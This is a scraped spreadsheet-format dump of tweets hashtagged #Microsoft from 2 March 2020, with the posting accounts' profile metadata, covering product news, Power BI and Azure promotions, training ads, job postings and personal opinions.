    <t>{'id': 36375784, 'id_str': '36375784', 'name': 'Matt Engibous', 'screen_name': 'mattengibous', 'location': 'Milwaukee, WI', 'description': 'Practice Manager @ConcurrencyInc #DigitalWorkplace #SharePoint #MicrosoftTeams and #Office365. Blessed with great a wife, 3 kids, family and friends.', 'url': 'https://t.co/njgQbgKrgA', 'entities': {'url': {'urls': [{'url': 'https://t.co/njgQbgKrgA', 'expanded_url': 'http://www.concurrency.com', 'display_url': 'concurrency.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 388, 'friends_count': 664, 'listed_count': 67, 'created_at': 'Wed Apr 29 14:53:30 +0000 2009', 'favourites_count': 1593, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1828,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'http://pbs.twimg.com/profile_images/3004036069/0359bec21aa79c998b958da912e9e003_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3004036069/0359bec21aa79c998b958da912e9e003_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/36375784/1494904935',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</si>
  <si>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14:13:37 +0000 2020</t>
  </si>
  <si>
    <t>Learn how to leverage Power BIs #datagovernance features to assure #data quality while providing users with the flexibility they need. Download #whitepaper - https://t.co/AEZjKejAbu
#powerbi #dataanalytics #microsoft #bigdata #datavisualisation #microsoftpowerbi #selfservice https://t.co/5SFW5teMIX</t>
  </si>
  <si>
    <t>{'id': 68125074, 'id_str': '68125074', 'name': 'Nous Infosystems', 'screen_name': 'nousinfosystems', 'location': 'US, UK, Canada, Germany, India', 'description': 'CMMi Level 5 SVC + SSD v1.3, ISO 9001:2015, and ISO/IEC 27001:2013 Global #ITServices company.', 'url': 'https://t.co/P7UpWx6qc2', 'entities': {'url': {'urls': [{'url': 'https://t.co/P7UpWx6qc2', 'expanded_url': 'https://www.nousinfosystems.com', 'display_url': 'nousinfosystems.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1177, 'friends_count': 973, 'listed_count': 58, 'created_at': 'Sun Aug 23 11:17:10 +0000 2009', 'favourites_count': 223, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 12011,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'http://pbs.twimg.com/profile_images/1115211444709019649/At97XcrL_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1115211444709019649/At97XcrL_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/68125074/1571309796',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</si>
  <si>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Mon Mar 02 14:13:35 +0000 2020</t>
  </si>
  <si>
    <t>Publish your Power BI report to the Power BI Service so others within your organization can use your report.
https://t.co/loudGjurpi
#microsoft #powerbi https://t.co/DgJwU1yWHW</t>
  </si>
  <si>
    <t>Mon Mar 02 14:12:15 +0000 2020</t>
  </si>
  <si>
    <t>Build5Nines Weekly: March 2, 2020
#Microsoft #Cloud #Azure #MicrosoftAzure #Build5Nines #BuildAzure #AzureWeekly https://t.co/NiCZPKlYPV</t>
  </si>
  <si>
    <t>Mon Mar 02 14:12:13 +0000 2020</t>
  </si>
  <si>
    <t>Build5Nines Weekly: March 2, 2020
#Microsoft #Cloud #Azure #MicrosoftAzure #Build5Nines #BuildAzure #AzureWeekly https://t.co/O80wLrh4Nl</t>
  </si>
  <si>
    <t>Mon Mar 02 14:10:34 +0000 2020</t>
  </si>
  <si>
    <t>Its Monday! That means a new rhino video! Check it out! 
#rhino #rhinoceros #rhinogame #rhinogaming #rhinoplays #minecraft #survival #play #playoffs #microsoft #xbox #playstation #hash #hashtag #dankmemes #gamingmemes #perfectlycutscreams #perfection #youtuber #redstone https://t.co/gLt5uDnlkL</t>
  </si>
  <si>
    <t>{'id': 4771459303, 'id_str': '4771459303', 'name': 'Ryan Matthew Cline', 'screen_name': 'RyanCline59', 'location': 'Grinnell, IA', 'description': '21 years old, physique model, YouTuber, Follow my other account-@Rhinogaming15', 'url': 'https://t.co/PQR4G4yJRI', 'entities': {'url': {'urls': [{'url': 'https://t.co/PQR4G4yJRI', 'expanded_url': 'https://m.youtube.com/channel/UCmMSisYk_M9X0PA2wIQ2PIw/videos', 'display_url': 'm.youtube.com/channel/UCmMSiâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 48, 'friends_count': 83, 'listed_count': 0, 'created_at': 'Sun Jan 17 02:52:53 +0000 2016', 'favourites_count': 697, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 442, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1029928742976724992/LM0v5mo-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1029928742976724992/LM0v5mo-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4771459303/1551931335',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</si>
  <si>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14:08:57 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft 44 million users reused credentials hacked in early 2019 #Microsoft #Breaches #CyberSecurity #Password #Username #Hacking https://t.co/e4kCuQfvwm</t>
  </si>
  <si>
    <t>Mon Mar 02 14:08:02 +0000 2020</t>
  </si>
  <si>
    <t>How #Microsoft Netherlands used data and relentless experimentation to reinvent the way it works &amp;gt; great example how #data &amp;amp; @_MyAnalytics can change the way your #workplace works https://t.co/AhG0QnRZhf https://t.co/v3JL6LZFn3</t>
  </si>
  <si>
    <t>{'id': 44354411, 'id_str': '44354411', 'name': 'Martin Mueller', 'screen_name': 'MuellersMartin', 'location': 'Mannheim, Baden-WÃ¼rttemberg', 'description': 'Co-Founder @PulseShift &amp; MC @camelot_mc | Creating #digital solutions to drive large scale #transformation | #ModernWorkplace &amp; #workplaceanalytics Enthusiast', 'url': 'https://t.co/n8A5e4vki0', 'entities': {'url': {'urls': [{'url': 'https://t.co/n8A5e4vki0', 'expanded_url': 'https://www.martinmueller.io', 'display_url': 'martinmueller.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1106, 'friends_count': 1574, 'listed_count': 218, 'created_at': 'Wed Jun 03 13:08:16 +0000 2009', 'favourites_count': 1480, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3131,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'http://pbs.twimg.com/profile_images/1206174992112721920/nKX_amer_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206174992112721920/nKX_amer_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44354411/1582988352',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</si>
  <si>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Mon Mar 02 14:07:02 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Curing your complex healthcare network ills with microsegmentation: " https://t.co/L5sQd886O7
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Mon Mar 02 14:05:17 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN hands-on training class coming to New York, May 12-14. Register now! #Microsoft #Windows10 #Win10 #mobility #aovpn https://t.co/ZYZd8isu1C</t>
  </si>
  <si>
    <t>Mon Mar 02 14:04:15 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Releases Azure Sphere Secure Edge to Cloud IoT Solution https://t.co/Qlz3tzyRZA by @ChannelFutures #Cloud #Tech #Microsoft #Blockchain https://t.co/tMuhoXi1uw</t>
  </si>
  <si>
    <t>Mon Mar 02 14:04:09 +0000 2020</t>
  </si>
  <si>
    <t>The threat landscape is ever changing, meaning protecting email for your business can be an intimidating task. Find out how to keep yourself protected against email based threats in our latest blog post: https://t.co/tiW2BrDZw3
#Security #Microsoft #Barracuda #EmailSecurity</t>
  </si>
  <si>
    <t>Mon Mar 02 14:02:33 +0000 2020</t>
  </si>
  <si>
    <t>Want to work at Ryder? We're hiring in #Miami, FL! Click the link in our bio for details on this job and more: Rental Asset Manager #Microsoft</t>
  </si>
  <si>
    <t>{'id': 24624880, 'id_str': '24624880', 'name': 'TMJ-MIA IT-.NET Jobs', 'screen_name': 'tmj_mia_itdnet', 'location': 'Miami, FL', 'description': 'Follow this account for geo-targeted Software Dev.  - Microsoft Tools job tweets in Miami, FL. Need help? Tweet us at @CareerArc!', 'url': 'https://t.co/rBgdBaokVO', 'entities': {'url': {'urls': [{'url': 'https://t.co/rBgdBaokVO', 'expanded_url': 'http://bit.ly/2IaQLfz', 'display_url': 'bit.ly/2IaQLfz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 199, 'friends_count': 171, 'listed_count': 9, 'created_at': 'Mon Mar 16 01:24:53 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 200,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'http://pbs.twimg.com/profile_images/682295462884438016/LRJnCFNz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/682295462884438016/LRJnCFNz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24624880/1451506891',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</si>
  <si>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Mon Mar 02 14:02:04 +0000 2020</t>
  </si>
  <si>
    <t>Join our @NICECompliance and @Microsoft compliance 'rock stars' for a forum dedicated to #Cloud and #Teams. Its your last chance to register  click here to learn more &amp;gt;&amp;gt;  https://t.co/3FozOXMHhN
#NICECompliance #NetworkwithNICE #Microsoft #Compliance
https://t.co/lhdosd5U3I</t>
  </si>
  <si>
    <t>{'id': 111246935, 'id_str': '111246935', 'name': 'Sunny Sachdeva', 'screen_name': 'sachsunny', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 157, 'friends_count': 185, 'listed_count': 2, 'created_at': 'Thu Feb 04 08:02:11 +0000 2010', 'favourites_count': 380, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1401,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'http://pbs.twimg.com/profile_images/764720713500590080/rw-NDfsd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/764720713500590080/rw-NDfsd_normal.jpg',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</si>
  <si>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Mon Mar 02 14:01:21 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Shuts Down Cortana Consumer Features https://t.co/5G1S5ExDUu #CIO #Cortana #Microsoft #VirtualAssistant #Cloud #Innovation #Mobility #Smartphones #InspiredBmedia</t>
  </si>
  <si>
    <t>{'id': 3305615771, 'id_str': '3305615771', 'name': 'CIO Inspired', 'screen_name': 'cioinspired', 'location': '16/5/2017 UK', 'description': 'A Global Gathering of CIO Executives in London who meet to discuss Cyber Security, Cloud, Data &amp; IoT.', 'url': 'https://t.co/j4FqjT9fid', 'entities': {'url': {'urls': [{'url': 'https://t.co/j4FqjT9fid', 'expanded_url': 'http://www.cioinspired.co.uk', 'display_url': 'cioinspired.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2582, 'friends_count': 1814, 'listed_count': 263, 'created_at': 'Mon Jun 01 14:11:49 +0000 2015', 'favourites_count': 116, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8051,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'http://pbs.twimg.com/profile_images/1047542100252938240/zV9imkYB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1047542100252938240/zV9imkYB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3305615771/1538588487',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</si>
  <si>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14:01:01 +0000 2020</t>
  </si>
  <si>
    <t>#blog #microsoft #windows10 #services #windowsinsiders 
Check out my work! https://t.co/UUPmBMLfLT</t>
  </si>
  <si>
    <t>{'id': 377628850, 'id_str': '377628850', 'name': 'AndrÃ© Silva', 'screen_name': 'andredotsilva', 'location': 'Porto', 'description': 'Consultant and Developer at Altran ( SPMP - ServiÃ§os Partilhados do MinistÃ©rio da SaÃºde )', 'url': 'https://t.co/StMeYClOCN', 'entities': {'url': {'urls': [{'url': 'https://t.co/StMeYClOCN', 'expanded_url': 'https://andredotsilva.net', 'display_url': 'andredotsilva.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 152, 'friends_count': 342, 'listed_count': 13, 'created_at': 'Wed Sep 21 21:36:21 +0000 2011', 'favourites_count': 811, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 642,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'http://pbs.twimg.com/profile_images/1076972646674378752/-U5c5qjL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1076972646674378752/-U5c5qjL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/377628850/1537438074', 'profile_link_color': '0371E6',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</si>
  <si>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Mon Mar 02 14:00:52 +0000 2020</t>
  </si>
  <si>
    <t>MS300 - Deploying Microsoft 365 Teamwork
Microsoft Teams is the hub for Teamwork in Microsoft 365. In this course you will learn how to plan, deploy and manage Microsoft Teams.
#microsoft #infrastructure #sharepoint #office365 https://t.co/HNhjLY3Lfr</t>
  </si>
  <si>
    <t>Mon Mar 02 14:00:43 +0000 2020</t>
  </si>
  <si>
    <t>Setting Windows 10 to Dark Mode (join the dark side)  https://t.co/FskOUbM5lP #Windows #Windows10 #SysAdmin #ITPro #Microsoft #darkmode</t>
  </si>
  <si>
    <t>Mon Mar 02 14:00:23 +0000 2020</t>
  </si>
  <si>
    <t>@Suave_Pirate leads the development team at Voicify and is a Xamarin and #Microsoft #MVP and we are so excited to have him as a speaker at DevSum!
Read more about Alex and the other speakers at https://t.co/Hk7yThnmlC
#DevSum https://t.co/1EA31Ey2DX</t>
  </si>
  <si>
    <t>{'id': 784352034371796992, 'id_str': '784352034371796992', 'name': 'DevSum', 'screen_name': 'DevSum_swe', 'location': 'Stockholm, Sverige', 'description': 'DevSum is the largest, best and most fun developer conference youâ€™ll visit and it takes place on the 28-29 May 2020 in Stockholm. #DevSum', 'url': 'https://t.co/snRKrtKbZC', 'entities': {'url': {'urls': [{'url': 'https://t.co/snRKrtKbZC', 'expanded_url': 'http://www.devsum.se', 'display_url': 'devsum.se', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 443, 'friends_count': 163, 'listed_count': 10, 'created_at': 'Fri Oct 07 11:17:52 +0000 2016', 'favourites_count': 229, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 444,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'http://pbs.twimg.com/profile_images/1197435181289881602/lsuee7wM_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1197435181289881602/lsuee7wM_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/784352034371796992/1574327683', 'profile_link_color': '8E2D67',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</si>
  <si>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13:59:00 +0000 2020</t>
  </si>
  <si>
    <t>I just watched a video that explains the features of #Windows10X , the latest disaster from #Microsoft.
Truly awful. It looks like a mutant that resulted from windows 10 mating with Android! Really horrible!</t>
  </si>
  <si>
    <t>{'id': 949526299600674816, 'id_str': '949526299600674816', 'name': 'Asem Saleh', 'screen_name': 'AsemSalehDE', 'location': '', 'description': 'IT engineer from Syria. PhD candidate.. Islam critic. Islamist scums are not welcome here', 'url': 'https://t.co/EJNOD8fuvG', 'entities': {'url': {'urls': [{'url': 'https://t.co/EJNOD8fuvG', 'expanded_url': 'https://www.youtube.com/AsemSaleh', 'display_url': 'youtube.com/AsemSaleh', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 89, 'friends_count': 89, 'listed_count': 2, 'created_at': 'Sat Jan 06 06:21:25 +0000 2018', 'favourites_count': 207, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 752, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/985215295336976385/1brNakCk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/985215295336976385/1brNakCk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/949526299600674816/1523728946',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</si>
  <si>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13:58:26 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is retiring its MCSA, MCSD and MCSE certifications in June 2020
https://t.co/yZzqV3sjBf https://t.co/pA8YdR0AYH</t>
  </si>
  <si>
    <t>{'id': 959465782727053312, 'id_str': '959465782727053312', 'name': 'Adapt Executives', 'screen_name': 'AdaptExec', 'location': '', 'description': 'Specialist IT recruitment focusing on Dynamics ERP, Dynamics CRM and Salesforce\n#msdyn365 #msdyn365bc #msdyn365fo', 'url': 'https://t.co/Fg9ZQaKhL8', 'entities': {'url': {'urls': [{'url': 'https://t.co/Fg9ZQaKhL8', 'expanded_url': 'http://www.adaptexecutives.com', 'display_url': 'adaptexecutives.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 206, 'listed_count': 1, 'created_at': 'Fri Feb 02 16:37:23 +0000 2018', 'favourites_count': 39, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1025, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1071151385717170177/wHBgfhEr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1071151385717170177/wHBgfhEr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/959465782727053312/1544218398',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</si>
  <si>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13:58:02 +0000 2020</t>
  </si>
  <si>
    <t>Remind I said about calls saying their calling from telephones company or #Microsoft its all #scams its on BBC1 at  8.30
PM tonight</t>
  </si>
  <si>
    <t>{'id': 1119419749, 'id_str': '1119419749', 'name': 'wheelchair chef', 'screen_name': 'HessionV', 'location': 'Salford, England', 'description': 'giving people with disabilities a chance to shine Also volunteer at university of Salford for occupational therapy Students (Teaching)', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2178, 'friends_count': 3928, 'listed_count': 70, 'created_at': 'Fri Jan 25 14:10:43 +0000 2013', 'favourites_count': 80239, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 45083,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'http://pbs.twimg.com/profile_images/480791540072054784/N3bSKoWQ_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/480791540072054784/N3bSKoWQ_normal.jpeg',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</si>
  <si>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13:57:28 +0000 2020</t>
  </si>
  <si>
    <t>Office 365 Weekly Digest | 2020-09 https://t.co/AGcbveMHNo #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 13:55:41 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft PowerPoint Masterclass for Certification - 93% OFF - Regular ($299.99) - Now Only $19.99
[Register] - https://t.co/mUuJ2QCCys
#Microsoft #BrianCulp #YouAccel #Courses #Learn #Learning #Knowledge 
Learn to Design Stunning Presentations in PowerPoint and Get Certi</t>
  </si>
  <si>
    <t>Mon Mar 02 13:54:16 +0000 2020</t>
  </si>
  <si>
    <t>uniFLOW Online is now listed in the Microsoft Azure Marketplace and AppSource
https://t.co/RYU9cspKsx
#uniflowonline #uniflow #ntware #canon #microsoft #azure https://t.co/6EjvgWlLJG</t>
  </si>
  <si>
    <t>{'id': 460981844, 'id_str': '460981844', 'name': 'uniFLOW', 'screen_name': 'ntware', 'location': 'Bad Iburg, Germany', 'description': 'NT-ware develops and supports the uniFLOW print &amp; scan management products for sale globally through the Canon reseller channel (Canon Group Company)\n#canon', 'url': 'https://t.co/p6WiZtMoix', 'entities': {'url': {'urls': [{'url': 'https://t.co/p6WiZtMoix', 'expanded_url': 'http://www.nt-ware.com', 'display_url': 'nt-ware.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 518, 'friends_count': 46, 'listed_count': 28, 'created_at': 'Wed Jan 11 09:56:56 +0000 2012', 'favourites_count': 109, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 546,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'http://pbs.twimg.com/profile_images/1097484111353139206/8utPgsl7_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1097484111353139206/8utPgsl7_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/460981844/1550495567',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</si>
  <si>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13:53:37 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Power BI is #platform which it provides details to the #nontechnical business users to understand and #analyze, #visualizing and sharing the #data with the respective. https://t.co/JyfcogpJHS
#GangBoard #Microsoft #PowerBI #excel #dashboard #businessintelligence https://t.co/YmfqhV3KJv</t>
  </si>
  <si>
    <t>Mon Mar 02 13:50:49 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Billgates #CoronaVirusUS #coronavirusunitedstates #Billgates #China
Did Bill Gates predict Corona virus the second time in this video... https://t.co/26mb1NimVb via @YouTube</t>
  </si>
  <si>
    <t>{'id': 1028368726016634880, 'id_str': '1028368726016634880', 'name': 'Joe Waiganjo', 'screen_name': 'WaiganjoJoe', 'location': '', 'description': 'Web Developer and Designer', 'url': 'https://t.co/8k4LD9f5FZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/8k4LD9f5FZ', 'expanded_url': 'https://www.techyrack.com', 'display_url': 'techyrack.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 155, 'friends_count': 818, 'listed_count': 0, 'created_at': 'Sat Aug 11 19:53:05 +0000 2018', 'favourites_count': 3457, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5993,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'http://pbs.twimg.com/profile_images/1231433809884844032/yil1WHN6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231433809884844032/yil1WHN6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1028368726016634880/1564928004',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</si>
  <si>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13:50:42 +0000 2020</t>
  </si>
  <si>
    <t>A student team from #India has emerged as runners-up at #Microsoft's annual "#ImagineCupAsia" regional finals for developing an #Androidapp that allows patients to scan the #RFIDtag on prescription medication to ensure its authenticity &amp;amp; allergen-compatibility with the patient. https://t.co/kaWud1KW9e</t>
  </si>
  <si>
    <t>{'id': 1169950443692158977, 'id_str': '1169950443692158977', 'name': 'IANSLIFE', 'screen_name': 'ianslife_in', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 93, 'friends_count': 15, 'listed_count': 2, 'created_at': 'Fri Sep 06 12:28:28 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5784, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1175067647420948480/Lq3yGdll_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175067647420948480/Lq3yGdll_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1169950443692158977/1568992935',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</si>
  <si>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13:49:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft tranforms Cortana into enterprise tool https://t.co/jSZf4YNJLl #Software #Workplace #Cortana #Microsoft @techzineeu https://t.co/IT6HDEfUgL</t>
  </si>
  <si>
    <t>{'id': 1168954887826227207, 'id_str': '1168954887826227207', 'name': 'Techzine Europe', 'screen_name': 'techzineeu', 'location': 'Netherlands', 'description': 'âœˆï¸ #Techzine covers the world of #technology\nðŸ•µï¸\u200dâ™‚ï¸ #IT #Cloud #Security #Data #Devops\nðŸ”Research &amp; analyse #enterprise solutions\nâ­ Learn more: https://t.co/8HYw418ykF', 'url': 'https://t.co/gpnZhD2ouq', 'entities': {'url': {'urls': [{'url': 'https://t.co/gpnZhD2ouq', 'expanded_url': 'https://www.techzine.eu', 'display_url': 'techzine.eu', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/8HYw418ykF', 'expanded_url': 'http://www.techzine.eu', 'display_url': 'techzine.eu', 'indices': [142, 165]}]}}, 'protected': False, 'followers_count': 1891, 'friends_count': 692, 'listed_count': 5, 'created_at': 'Tue Sep 03 18:32:29 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 821, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1168956693948096513/nl1asOnw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168956693948096513/nl1asOnw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1168954887826227207/1571049196',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</si>
  <si>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13:46:20 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 Insider Preview Build 19041.113 (KB4540409)
#windowsInsider #SlowRing #Microsoft #Windows10 https://t.co/gSMsE1JDxD https://t.co/EUOq6YdxWv</t>
  </si>
  <si>
    <t>Mon Mar 02 13:45:10 +0000 2020</t>
  </si>
  <si>
    <t>RTF - read the fuck'n manual! 
#xbox #ps4 #swich #sony #microsoft #nintendo #stadia #retro #retrogames #gamer #games #jogoseletronicos #gameplay #playthrought #live #canalgame #supernintendo #megadrive #mastersystem #atari #3do #intellevision #nes https://t.co/Efv4utm9uG</t>
  </si>
  <si>
    <t>{'id': 29934620, 'id_str': '29934620', 'name': 'Andreend_Playing_for_Life', 'screen_name': 'Andreend_PfLife', 'location': 'Brazil', 'description': 'Andreend_Playing_for_Life Ã© sobre notÃ­cias, dicas e humor relacionado ao mundo gamer, com pitada de pop e geek.', 'url': 'https://t.co/C7lBRuZqGq', 'entities': {'url': {'urls': [{'url': 'https://t.co/C7lBRuZqGq', 'expanded_url': 'https://www.facebook.com/andreendplayingforlife/', 'display_url': 'facebook.com/andreendplayinâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 41, 'friends_count': 61, 'listed_count': 0, 'created_at': 'Thu Apr 09 06:11:41 +0000 2009', 'favourites_count': 950, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2163,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'http://pbs.twimg.com/profile_images/1168632214571163649/vMc3xFHF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168632214571163649/vMc3xFHF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/29934620/1567458608',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</si>
  <si>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Mon Mar 02 13:44:45 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Dynamics #365
Work on #Activities in #Kanban view
Here a brief #video showing how the #interaction looks like and two #useful links if you want to enable it.
Enjoy !
https://t.co/xIFDvask1G
https://t.co/nKcpsWMlPg https://t.co/F1cZuBIDCY</t>
  </si>
  <si>
    <t>Mon Mar 02 13:43:13 +0000 2020</t>
  </si>
  <si>
    <t>Cortana in the upcoming Windows 10 release: focused on your productivity with enhanced security and privacy #Microsoft365 #Windows10 #Microsoft https://t.co/pHSI7oQtAc</t>
  </si>
  <si>
    <t>Mon Mar 02 13:40:24 +0000 2020</t>
  </si>
  <si>
    <t>Credentials are the Achilles heel of cybersecurity. With #Microsoft 365 Advanced Threat Protection, Broadview Networks reduces your risk. https://t.co/tyJWa6yn5p</t>
  </si>
  <si>
    <t>Mon Mar 02 13:40:07 +0000 2020</t>
  </si>
  <si>
    <t>Back in the office and we're still thrilled by how wonderful our weekend at the @scottishsummit was! 
Thanks to all those who presented at and organised the event, you did a great job and the #Microsoft community is lucky to have you! 
#SS2020 #ScottishSummit https://t.co/sdsCaCSfMK</t>
  </si>
  <si>
    <t>{'id': 728169903648350208, 'id_str': '728169903648350208', 'name': 'Paribus 365', 'screen_name': 'Paribus365', 'location': 'Global', 'description': 'Enhancing #Dynamics365 user experience and efficiency whilst improving #dataquality ðŸ“ˆ #DataManagement #DataCleansing #ISV', 'url': 'https://t.co/uCVSTkGhSD', 'entities': {'url': {'urls': [{'url': 'https://t.co/uCVSTkGhSD', 'expanded_url': 'http://www.paribuscloud.com', 'display_url': 'paribuscloud.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 267, 'friends_count': 653, 'listed_count': 4, 'created_at': 'Thu May 05 10:30:08 +0000 2016', 'favourites_count': 778, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 721,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'http://pbs.twimg.com/profile_images/1182205949832056837/oD7yQXk2_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1182205949832056837/oD7yQXk2_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/728169903648350208/1581611242', 'profile_link_color': '005EB8',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</si>
  <si>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13:39:41 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft launches Global Social Entrepreneurship programme to Empower Social Entrepreneurs 
#Microsoft #Kenya #startups  #technology 
https://t.co/uErOIseNja</t>
  </si>
  <si>
